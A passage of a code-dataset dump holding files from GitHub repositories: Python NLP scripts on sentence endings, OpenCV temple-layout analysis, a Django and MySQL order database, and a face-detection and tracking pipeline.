word_tagged[0][1].startswith('DT')\n \n # Ascertain whether or not 'precursor' and 'word_tagged' represent the types of \n # words that would typically conclude a sentence\n right_pair = pair1 or pair2 or pair3 or pair4 or pair5 or pair6\n \n # If the pair matches any of the specified patterns and are within range of \n # the average lengths of sentences, add a period and reset the count\n if word in range(10, 16) and right_pair:\n phrase[phrase.index(i)] += '.'\n word = 0\n \n precursor = word_tagged\n \n # Produce the phrase with the inserted punctuation \n return \" \".join(phrase)\n \n \nwords = (\"I am really sorry you had to spend time figuring this out \"\n \"I understand this must be frustrating for you I really appreciate \"\n \"your help and I know it’s stressful when you’ve got work to do and \"\n \"you’re stuck like this As soon as you reply I’ll be automatically \"\n \"notified so I can start investigating for you\")\n\nprint(\"\\n\" + PhraseMaker(words) + \"\\n\")\n\n\ntranscript_1 = (\"Yeah, I think I largely do The uncomfortable thing for me \"\n \"I think is when I'm afraid I'm gonna make the other person \"\n \"feel uncomfortable Cause you know I bring up my dead mom, it's \"\n \"like the air gets sucked out of the room So I, I mostly want to \"\n \"be able to just talk about it and feel comfortable sharing this \"\n \"truth about my life and not make everyone sad or scared \"\n \"or uncomfortable\")\n\nprint(\"\\n\" + PhraseMaker(transcript_1) + \"\\n\")"
},
{
"alpha_fraction": 0.6308695673942566,
"alphanum_fraction": 0.6491304636001587,
"avg_line_length": 27.407407760620117,
"blob_id": "ba98baf242a7890a918d9280c56938389f606850",
"content_id": "57aad33371fc1fa95124f8ae0255e07470cce161",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2300,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 81,
"path": "/Phrase_Segmentation/mobydick_phrase_endings.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 18 12:19:16 2020\n\n@author: am_ka\n\"\"\"\n\nimport string\nimport operator \nimport nltk\nfrom nltk.book import *\nfrom nltk import word_tokenize \n\nmoby = gutenberg.sents('melville-moby_dick.txt')\nprint(\"\\nCorpus Loaded\")\n\ndef TagMaker(word):\n text = word_tokenize(word)\n tagged = nltk.pos_tag(text)\n return tagged[0][1]\n\nclean_tokens = []\nrec = {}\n\n\n# Iterate through each sentence in 'Moby Dick' and contruct a dictionary\n# entry for each word-pairing it ends with (attempting to avoid punctuation)\n# and its corresponding frequency. \n# If one instance of a specific word pairing already exists within the\n# dictionary, increase its frequency count by one instead of creating an entry.\n \n''' N.B. This could've been accomplished with nltk's 'bigrams' function, but \n it only works for nltk corpora. I wanted this to work with any large body\n of text, for which the formatting process would come easily. '''\n \nfor sentence in moby:\n if len(sentence) < 3:\n continue\n \n x = -1\n \n while sentence[x].isalpha() != True or sentence[x - 1].isalpha() != True or sentence[x] in string.punctuation:\n x -= 1\n if sentence[x] == i[0]:\n break\n if (len(sentence) + x) < 1:\n continue\n \n end_pair = sentence[x - 1] + \"/\" + sentence[x]\n \n if end_pair not in rec:\n rec[end_pair] = 1\n else: \n rec[end_pair] += 1\n\nprint(\"\\nRecord Complete\") \n# Output the 15 word pairings with the highest counts\nend_pairs = dict(sorted(rec.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairings\\n\" + \"-\"*26)\nprint(end_pairs)\n\n# Construct a dictionary now of word-type pairings coupled with their frequencies\n# within the prevously constructed dictionary.\ncodex = {}\nfor i in rec.keys():\n split_key = i.split(\"/\")\n \n j = TagMaker(split_key[0])\n k = TagMaker(split_key[1])\n \n tag_pair = j + \"/\" + k\n \n if tag_pair not in codex:\n codex[tag_pair] = 1\n else:\n codex[tag_pair] += 1\n \n# Output the 15 word-type pairings with the highest counts \nend_pair_tags = dict(sorted(codex.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairing Tags\\n\" + \"-\"*30)\nprint(end_pair_tags)"
},
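For comparison, nltk's bigrams helper (mentioned in the N.B. above) works on any token sequence, so end-pair extraction can be phrased as:

import nltk

tokens = "Call me Ishmael .".split()
pairs = list(nltk.bigrams(tokens))
print(pairs)   # [('Call', 'me'), ('me', 'Ishmael'), ('Ishmael', '.')]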
{
"alpha_fraction": 0.44536083936691284,
"alphanum_fraction": 0.5189003348350525,
"avg_line_length": 21.88524627685547,
"blob_id": "1a1a84d4e5e711e45395c48adb7aef42b1d6d857",
"content_id": "a3d95fbeed519a16fd87efd150d3826774f8bd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 61,
"path": "/TempleLayout_Analyzer/FeelinBlue.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 17 14:30:22 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\n#import numpy as np\r\n\r\ndef isBlue(px):\r\n '''return True if blue'''\r\n b, g, r = px\r\n truth = b > r + 50 and b > g + 50\r\n return truth\r\n\r\nfilename = 'ParthenonMrkd.png'\r\nimg = cv2.imread(filename)\r\n\r\n\r\nh, w = img.shape[:2]\r\nx = w // 2\r\nfor y in range(h):\r\n if isBlue(img[y, x]): \r\n break \r\n\r\nstuff = []\r\nfor x in range(w):\r\n if isBlue(img[y,x]):\r\n stuff.append(x)\r\n \r\nleft = min(stuff)\r\nright = max(stuff)\r\n\r\nTempleWidth = right - left\r\na = TempleWidth // 2\r\nb = (4*a) // 3\r\ncenter = ((right - left) // 2) + left\r\nc = (5*a) // 3\r\n\r\n'''Markers'''\r\ncv2.drawMarker(img, (center + a, y + b), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (center,y), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (center, y + b), (0, 255, 0), 2)\r\ncv2.drawMarker(img, (left, y + b), (0, 255, 0), 2)\r\n\r\n'''Circles'''\r\ncv2.circle(img, (center, y + b), c, (0, 0, 255), 2)\r\n#cv2.circle(img, (center + a, y + b), b, (0, 0, 255), 2)\r\n#cv2.circle(img, (center - a, y + b), b, (0, 0, 255), 2)\r\n#\r\ncv2.circle(img, (center, y +b), a, (0, 0, 255), 2)\r\n\r\n\r\n'''Circumscribed Pythagorean Triangle'''\r\ncv2.line(img, (center - a, y), (center + a, y + (2*b)), (0, 0, 255), 2)\r\n#cv2.line(img, (center - a, y), (center + a, y), (0, 0, 255), 2)\r\n#cv2.line(img, (center + a, y), (center + a, y + (2*b)), (0, 0, 255), 2)\r\n\r\n\r\ncv2.imwrite('Blue_Output_Parthenon.jpg', img)"
},
{
"alpha_fraction": 0.43512657284736633,
"alphanum_fraction": 0.5490506291389465,
"avg_line_length": 20.64285659790039,
"blob_id": "84f8cc4135375c6b9534a78ecb11b70e2763666d",
"content_id": "d3c889516222c2fd00fb4760ef4e65ae07b582bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 28,
"path": "/TempleLayout_Analyzer/HoughLineDetect.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 15 16:27:35 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg = cv2.imread('Temple.png')\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nedges = cv2.Canny(gray, 50, 150, apertureSize = 3)\r\n\r\nlines = cv2.HoughLines(edges, 1, np.pi/180, 200)\r\nfor rho, theta in lines[0]:\r\n a = np.cos(theta)\r\n b = np.sin(theta)\r\n x0 = a*rho\r\n y0 = b*rho\r\n x1 = int(x0 + 1000*(-b))\r\n y1 = int(y0 + 1000*(a))\r\n x2 = int(x0 - 1000*(-b))\r\n y2 = int(y0 - 1000*(a))\r\n \r\n cv2.line(img, (x1,y1), (x2, y2), (0,0,255), 2)\r\n \r\ncv2.imwrite('lined_output.jpg', img)"
},
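A related option is the probabilistic transform, which returns finite segments directly and is often easier to consume than (rho, theta) pairs; a sketch against the same Temple.png, with threshold/minLineLength values that would need tuning for a real drawing:

import cv2
import numpy as np

img = cv2.imread('Temple.png')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 50, 150, apertureSize=3)

segments = cv2.HoughLinesP(edges, 1, np.pi / 180, 100,
                           minLineLength=50, maxLineGap=10)
if segments is not None:
    for x1, y1, x2, y2 in segments[:, 0]:
        cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 2)

cv2.imwrite('lined_output_p.jpg', img)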
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.5900253653526306,
"avg_line_length": 22.670000076293945,
"blob_id": "7d3b0fb07f350e4a01ef94a599877b1f030ae254",
"content_id": "29f9e589e64f093f2e44ca6379d0ff328de070da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2366,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 100,
"path": "/Phrase_Segmentation/podcast_phrase_endings.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 11 14:31:20 2021\n\n@author: am_ka\n\"\"\"\n\nimport string\nimport operator \nimport nltk\nfrom nltk import word_tokenize \n\nsource = open(\"podcast_1.txt\", \"r\")\nprint(\"\\nSource Mat Loaded\")\n\ndef TagMaker(word):\n text = word_tokenize(word)\n tagged = nltk.pos_tag(text)\n return tagged[0][1]\n\n\nlisted_sentences = []\nclean_tokens = []\nrec = {}\n \nterminal_punct = [\".\", \"?\", \"!\"]\n\nline = []\nfor sentence in source:\n \n sentence = sentence.split(\" \")\n \n for word in sentence:\n line.append(word)\n for char in word:\n if char in terminal_punct:\n listed_sentences.append(line)\n line = []\n \nsource.close() # Close the sourcefile \n\n## Process to clear the word of terminal punctuation (imperfect right now) \nline_index = 0\nword_index = 0\n \nfor line in listed_sentences:\n for word in line:\n for char in word:\n if char in terminal_punct:\n listed_sentences[line_index][word_index] = word.translate(str.maketrans('', '', string.punctuation))\n word_index += 1\n \n line_index += 1\n word_index = 0 \n \nprint(\"\\nSentences Configured\") \n\n\n## Extract the end pairings \nx = -1\nfor line in listed_sentences: \n if len(line) < 3:\n continue\n \n end_pair = line[x - 1] + \"/\" + line[x]\n \n if end_pair not in rec:\n rec[end_pair] = 1\n else: \n rec[end_pair] += 1\n\nprint(\"\\nRecord Complete\") \n \n## Output the 15 word pairings with the highest counts\nend_pairs = dict(sorted(rec.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairings\\n\" + \"-\"*26)\nprint(end_pairs)\n\n\n\n## Construct a dictionary now of word-type pairings coupled with their count\n## within the prevously constructed dictionary.\ncodex = {}\nfor i in rec.keys():\n split_key = i.split(\"/\")\n \n j = TagMaker(split_key[0])\n k = TagMaker(split_key[1])\n \n tag_pair = j + \"/\" + k\n \n if tag_pair not in codex:\n codex[tag_pair] = 1\n else:\n codex[tag_pair] += 1\n \n## Output the 15 word-type pairings with the highest counts \nend_pair_tags = dict(sorted(codex.items(), key=operator.itemgetter(1), reverse=True)[:15])\nprint(\"\\nMost Frequent End Pairing Tags\\n\" + \"-\"*30)\nprint(end_pair_tags)"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 65,
"blob_id": "6a03c4495ba8dbe940c79dc70d05fae4a6f3dcd3",
"content_id": "69793f892501820ee052c8f59d76e102b48a0fe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 3,
"path": "/README.md",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# PersonalProjects-Logos-Endiathetos-\n**A repo of scripts for my Digital Humanities' Projects**\nCombining literature with elements of machine learning to note trends in writing structure and style.\n"
},
{
"alpha_fraction": 0.5402597188949585,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 18.36842155456543,
"blob_id": "dbc80e06be6406dd7b35faebaf1339851368c895",
"content_id": "dec1878dcf7be9733c7f9c4b12251265510b6c52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/TempleLayout_Analyzer/Layout1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 22:40:03 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nfrom PIL import Image\r\n\r\nlayout = Image.open('Temple.PNG')\r\n\r\ndef Layout(pic):\r\n \r\n newImage = Image.new('RGB', (pic.size))\r\n\r\n for x in range(newImage.width):\r\n for y in range(newImage.height):\r\n newImage.putpixel((x, y), (pic.getpixel((x, y))))\r\n\r\n return newImage"
},
{
"alpha_fraction": 0.4693877696990967,
"alphanum_fraction": 0.5257142782211304,
"avg_line_length": 20.090909957885742,
"blob_id": "6027b6470ae1303ba9a8faf5c53315c60ebac18f",
"content_id": "1e91962c68299eb48d0ddb62660c6dc2c78630ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1225,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 55,
"path": "/TempleLayout_Analyzer/HarrisCornerDetect1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 15:48:40 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nfilename = 'Temple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\n#img[dst(1)>0.01*dst.max()]=[255, 0, 0]\r\n\r\n\r\n#cv2.imshow('dst', img)\r\n#if cv2.waitKey(0) & 0xff == 27:\r\n# cv2.destroyAllWindows()\r\nflag = False \r\n#colSums = []\r\n#rowSums = []\r\nrowLength = 0\r\ncolLength = 0\r\n#for y in range(len(dst)):\r\n #rowSums.append(sum(dst[y]))\r\n #for x in range(len(dst[y])):\r\n #if dst[y, x] > 0:\r\n \r\n# #img[y, x]= [255, 0, 0]\r\n# cv2.circle(img, (x,y), 40, (255, 0, 0), 5)\r\n# print(x, y)\r\n# flag = True\r\n# break\r\n# if flag: \r\n# break\r\nTempleWidth = []\r\nfor y in range(len(dst)):\r\n TempleWidths=[]\r\n for x in range(len(dst)):\r\n if dst[y, x] > 0:\r\n TempleWidths.append(dst[y, x])\r\n TempleWidth.append(int(len(TempleWidths())))\r\n \r\nprint(rowLength)\r\ncv2.imwrite('output.jpg', img) "
}
] | 23 |
tennisonliu/TensorflowDeepSortTracking | https://github.com/tennisonliu/TensorflowDeepSortTracking | 6713d20ac7f4727a16d3edd528cc5c099c617a39 | 38f9e652033a5c886b9910235807aefb5b9cd3e2 | d9d8f580b5429f21981fb6d456bd8ab63ead679b | refs/heads/master | 2020-07-30T12:36:30.748721 | 2019-09-30T03:53:34 | 2019-09-30T03:53:34 | 210,237,081 | 0 | 0 | null | 2019-09-23T01:05:25 | 2019-09-14T11:54:23 | 2019-09-07T19:58:34 | null | [
{
"alpha_fraction": 0.6294201016426086,
"alphanum_fraction": 0.6379066705703735,
"avg_line_length": 33.5,
"blob_id": "149e1bab4c197fd5e6e78949f123c20be9c3e306",
"content_id": "b5cf98fd728b77238f5eff24c373fd7b62d79530",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/threads/ImageInput/CsiThread.py",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport cv2\nfrom threads.ImageInput.AbstractImageInputThread \\ \n import AbstractImageInputThread\n\nclass CsiThread(AbstractImageInputThread):\n def __init__(self, name, gstreamer_init):\n super().init(name, IMAGE_WIDTH, IMAGE_HEIGHT)\n self.cap = self.init_input(IMAGE_WIDTH, IMAGE_HEIGHT, gstreamer_init)\n \n def init_input(self, IMAGE_WIDTH, IMAGE_HEIGHT, gstreamer_init):\n cap = cv2.VideoCapture(gstreamer_init, cv2.CAP_GSTREAMER)\n assert cap.isOPened(), 'Could not open CSI Camera.'\n cap.set(3, IMAGE_WIDTH)\n cap.set(4, IMAGE_HEIGHT)\n \n def stop(self):\n super().stop()\n self.cap.release()\n \n "
},
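Stripped of the thread wrapper, the CSI capture path is just a GStreamer pipeline string handed to OpenCV; a sketch assuming an OpenCV build with GStreamer support and the pipeline produced by gstreamer_pipeline() in main.py:

import cv2

pipeline = ('nvarguscamerasrc ! '
            'video/x-raw(memory:NVMM), width=(int)1280, height=(int)720, '
            'format=(string)NV12, framerate=(fraction)20/1 ! '
            'nvvidconv flip-method=0 ! '
            'video/x-raw, width=(int)1280, height=(int)720, format=(string)BGRx ! '
            'videoconvert ! video/x-raw, format=(string)BGR ! appsink')

cap = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)
assert cap.isOpened(), 'Could not open CSI camera'
ok, frame = cap.read()    # frame is a BGR numpy array when ok is True
if ok:
    print(frame.shape)
cap.release()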
{
"alpha_fraction": 0.6061336398124695,
"alphanum_fraction": 0.6170865297317505,
"avg_line_length": 35.52000045776367,
"blob_id": "ce20a665fb32b8fcca0b5895dd0e5881a413f1b8",
"content_id": "9c21cdb193cd2d90832ddff1720713f3bed6b8a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4565,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 125,
"path": "/main.py",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "from ObjectTracking.deep_sort_tracker import DeepSortTracker\nfrom threads.ImageInput.WebcamThread import UsbThread\nfrom threads.ImageInput.VideoThread import VideoThread\nfrom threads.Predictor.PredictorImage import PredictorImage\nimport cv2\nimport warnings\nfrom utilities import constants\nfrom utilities import helper\nimport argparse\nfrom edgetpu.detection.engine import DetectionEngine\nfrom PIL import Image\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport json\nwarnings.filterwarnings('ignore')\n\n'''\nWEBCAM_INPUT = 'cam'\ndef init(inputSrc):\n if inputSrc == WEBCAM_INPUT:\n # Run the webcam thread\n thread_image = WebcamThread('Webcam Thread', 1)\n else:\n thread_image = VideoThread('Video Thread', inputSrc, FPS=25.0)\n\n thread_image.start()\n image_data = thread_image.image_data\n # Run the COCO Model\n thread_coco = PredictorImage('coco',\n constants.CKPT_COCO,\n constants.LABELS_COCO,\n image_data,\n score_thresh=0.5,\n WITH_TRACKER=False)\n thread_coco.start()\n thread_coco.continue_predictor()\n # Initialize the Tracker\n tracker = DeepSortTracker()\n return tracker, thread_coco, thread_image\n'''\n\ndef gstreamer_pipeline(capture_width = 1280, capture_heights = 720, display_width = 1280,\n display_height = 720, framerate = 20, flip_method=0):\n return('nvarguscamerasrc ! '\n 'video/x-raw(memory:NVMM), '\n 'width=(int)%d, height=(int)%d, '\n 'format=(string)NV12, framerate=(fraction)%d/1 ! '\n 'nvvidconv flip-method=%d ! '\n 'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! '\n 'videoconvert ! '\n 'video/x-raw, format=(string)BGR ! appsink' %\n (capture_width, capture_height, framerate, flip_method, display_width, display_height))\n\n\ndef init(input_src, faceModel, emotionModel):\n # initiate camera feed\n if input_src == 'csi':\n stream_thread = CsiThread('Csi Thread', gstreamer_pipeline())\n if input_src == 'usb':\n stream_thread = UsbThread('USB Thread', 0)\n \n stream_thread.start()\n \n # initialise models\n faceEngine = DetectionEngine(faceModel)\n global emotionList \n emotionList = ['angry', 'disgust', 'scared', 'happy', 'sad', 'surprised', 'neutral']\n emotionNet = load_model(emotionModel, compile = False)\n \n # initialise tracker\n tracker = DeepSortTracker()\n return stream_thread, faceEngine, emotionNet, tracker\n\n'''\ndef main(cap, faceEngine, emotionNet, tracker):\n frameName = 'Main Frame'\n print('Running a Tensorflow model with the DeepSORT Tracker')\n # Run the main loop\n while True:\n # Grab the image and convert from RGB -> BGR\n image_np = thread_image.image_data.image_np.copy()[:, :, ::-1]\n output_data = thread_coco.output_data\n output_data = tracker.run(output_data, image_np)\n image_np = helper.drawDetectedBBs(image_np.copy(),\n output_data,\n score_thresh=0.1)\n\n cv2.imshow(frameName, image_np)\n key = cv2.waitKey(10)\n if key == ord('q'):\n break\n cv2.destroyAllWindows()\n'''\n\ndef main(stream, faceEngine, emotionNet, tracker):\n frameName = 'Main Frame'\n print('Running a Tensorflow model with the DeepSORT Tracker')\n # Run the main loop\n while True:\n frame = stream.image_data\n # frame = stream.image_data.image_np.copy()[:, :, ::-1]\n \n frame_pil = Image.fromarray(frame)\n faces = engine.DetectWithImage(frame_pil, threshold=0.05, \n keep_aspect_ratio=False, relative_coord=False,\n top_k=10)\n image_np = helper.drawDetectedBBs(frame_pil.copy(), faces, score_thres=0.1)\n \n cv2.imshow(frameName, 
image_np)\n key = cv2.waitKey(1)\n if key == ord('q'):\n break\n\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n faceModel = './deploy_model/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite'\n emotionModel = './deploy_model/emotion_net.hdf5'\n input_src = 'csi'\n \n stream, faceEngine, emotionNet, tracker = init(input_src, faceModel, emotionModel)\n main(stream, faceEngine, emotionNet, tracker)\n"
},
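main.py loads emotionNet but never calls it; a hedged sketch of the missing classification step: crop each detected box and run the Keras model. The 64x64 grayscale input shape is an assumption about emotion_net.hdf5, not something the repo states.

import cv2
import numpy as np

def classify_emotion(frame_bgr, box, emotion_net, labels):
    # box: (x1, y1, x2, y2) pixel coordinates from the face detector
    x1, y1, x2, y2 = [int(v) for v in box]
    roi = cv2.cvtColor(frame_bgr[y1:y2, x1:x2], cv2.COLOR_BGR2GRAY)
    roi = cv2.resize(roi, (64, 64)).astype('float32') / 255.0   # assumed input size
    roi = roi[np.newaxis, :, :, np.newaxis]                     # shape (1, 64, 64, 1)
    probs = emotion_net.predict(roi)[0]
    return labels[int(np.argmax(probs))]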
{
"alpha_fraction": 0.8116196990013123,
"alphanum_fraction": 0.8169013857841492,
"avg_line_length": 62,
"blob_id": "599cc975e6f0542c8f13bebd0e06e46cf02d415d",
"content_id": "ec9a2b27ab965f2f9e606bde95e78b1861b80bb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 568,
"license_type": "no_license",
"max_line_length": 423,
"num_lines": 9,
"path": "/.spyproject/workspace.ini",
"repo_name": "tennisonliu/TensorflowDeepSortTracking",
"src_encoding": "UTF-8",
"text": "[workspace]\nrestore_data_on_startup = True\nsave_data_on_exit = True\nsave_history = True\nsave_non_project_files = False\n\n[main]\nversion = 0.1.0\nrecent_files = ['/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/ObjectTracking/deep_sort/tracker.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/main.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/threads/ImageInput/CsiThread.py', '/Users/tennisonliu/Desktop/mam_with_deepsort/TensorflowDeepSortTracking/threads/ImageInput/UsbThread.py']\n\n"
}
] | 3 |
rg3915/banco_de_dados | https://github.com/rg3915/banco_de_dados | cfabef8e75b60b5375aad275406c3978cb0f5550 | 9ff659891841c3a40f7a572d1edd83591d9dd335 | 27c29639f1e68687cafaaa3f4c0caf3ced020aeb | refs/heads/master | 2016-09-06T03:37:26.653906 | 2014-09-04T04:37:31 | 2014-09-04T04:37:31 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.730671226978302,
"alphanum_fraction": 0.7383177280426025,
"avg_line_length": 22.540000915527344,
"blob_id": "92fdd6a7283a5df5c135a3d57a8f7974e240a3f1",
"content_id": "4669be792b8cc8c505992a2bf39aa8456924e62a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 50,
"path": "/pedido/pedido_project/pedido/models.py",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nfrom django.db import models\nfrom datetime import date\n\nclass Cliente(models.Model):\n\tnome = models.CharField('Nome', max_length=50)\n\n\tclass Meta:\n\t\tverbose_name=u'cliente'\n\t\tverbose_name_plural=u'clientes'\n\n\tdef __unicode__(self):\n\t\treturn self.nome\n\nclass Categoria(models.Model):\n\tcategoria = models.CharField('Categoria', max_length=50)\n\n\tclass Meta:\n\t\tverbose_name=u'categoria'\n\t\tverbose_name_plural=u'categorias'\n\n\tdef __unicode__(self):\n\t\treturn self.categoria\n\nclass Produto(models.Model):\n\tcategoria = models.ForeignKey(Categoria)\n\tproduto = models.CharField('Produto', max_length=50)\n\tpreco = models.DecimalField('Preço', max_digits=8, decimal_places=2)\n\n\tclass Meta:\n\t\tverbose_name=u'produto'\n\t\tverbose_name_plural=u'produtos'\n\n\tdef __unicode__(self):\n\t\treturn self.produto\n\nclass Pedido(models.Model):\n\tdata_pedido = models.DateField('Data do pedido')\n\tcliente = models.ForeignKey(Cliente)\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.data_pedido)\n\nclass DetPedido(models.Model):\n\tpedido = models.ForeignKey(Pedido)\n\tproduto = models.ForeignKey(Produto)\n\tquantidade = models.IntegerField()\n\n\tdef __unicode__(self):\n\t\treturn unicode(self.pedido)\n"
},
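A usage sketch against the models above (e.g. in the Django shell), ending with the ORM equivalent of the "clients who placed an order" query from pedido.sql:

from datetime import date
from pedido.models import Cliente, Categoria, Produto, Pedido, DetPedido

cliente = Cliente.objects.create(nome='Amanda')
categoria = Categoria.objects.create(categoria='Informatica')
produto = Produto.objects.create(categoria=categoria, produto='Notebook', preco=1200)

pedido = Pedido.objects.create(data_pedido=date.today(), cliente=cliente)
DetPedido.objects.create(pedido=pedido, produto=produto, quantidade=2)

# distinct names of clients that have at least one order
nomes = Cliente.objects.filter(pedido__isnull=False).distinct().values_list('nome', flat=True)
print(list(nomes))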
{
"alpha_fraction": 0.6957913041114807,
"alphanum_fraction": 0.7479596734046936,
"avg_line_length": 49.39516067504883,
"blob_id": "89a1ba73abfdb324feee908e050c76cfb16888b6",
"content_id": "a315cadc44b4e6abb72912ca567b65e7570b63a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 6249,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 124,
"path": "/pedido/modelagem/pedido.sql",
"repo_name": "rg3915/banco_de_dados",
"src_encoding": "UTF-8",
"text": "-- Criando schema\nCREATE SCHEMA pedidos;\nUSE pedidos;\n\n-- Criando as tabelas\nCREATE TABLE clientes (\n\tidCliente INT AUTO_INCREMENT PRIMARY KEY,\n\tnome VARCHAR(50)\n);\nCREATE TABLE categorias (\n\tidCategoria INT AUTO_INCREMENT PRIMARY KEY,\n\tcategoria VARCHAR(50)\n);\nCREATE TABLE produtos (\n\tidProduto INT AUTO_INCREMENT PRIMARY KEY,\n\tproduto VARCHAR(50),\n\tpreco DECIMAL(2),\n\tidCategoria INT,\n\tFOREIGN KEY (idCategoria) REFERENCES categorias(idCategoria)\n);\nCREATE TABLE pedidos (\n\tidPedido INT AUTO_INCREMENT PRIMARY KEY,\n\tdataPedido DATETIME,\n\tidCliente INT,\n\tFOREIGN KEY (idCliente) REFERENCES clientes(idCliente)\n);\nCREATE TABLE detPedidos (\n\tiddetPedido INT AUTO_INCREMENT PRIMARY KEY,\n\tquantidade INT,\n\tidPedido INT,\n\tidProduto INT,\n\tFOREIGN KEY (idPedido) REFERENCES pedidos(idPedido),\n\tFOREIGN KEY (idProduto) REFERENCES produtos(idProduto)\n);\n\n-- Populando clientes\nINSERT INTO clientes (nome) VALUES ('Amanda');\nINSERT INTO clientes (nome) VALUES ('Beatriz');\nINSERT INTO clientes (nome) VALUES ('Carla');\nINSERT INTO clientes (nome) VALUES ('Denise');\nINSERT INTO clientes (nome) VALUES ('Eloisa');\nINSERT INTO clientes (nome) VALUES ('Fernanda');\nINSERT INTO clientes (nome) VALUES ('Gabriela');\nINSERT INTO clientes (nome) VALUES ('Isadora');\nINSERT INTO clientes (nome) VALUES ('Joana');\n\n-- Populando categorias\nINSERT INTO categorias (categoria) VALUES ('Cama Mesa Banho');\nINSERT INTO categorias (categoria) VALUES ('Eletrodomestico');\nINSERT INTO categorias (categoria) VALUES ('Informatica');\nINSERT INTO categorias (categoria) VALUES ('Movel');\nINSERT INTO categorias (categoria) VALUES ('Roupa');\nINSERT INTO categorias (categoria) VALUES ('Som');\nINSERT INTO categorias (categoria) VALUES ('Video');\n\n-- Populando produtos\nINSERT INTO produtos 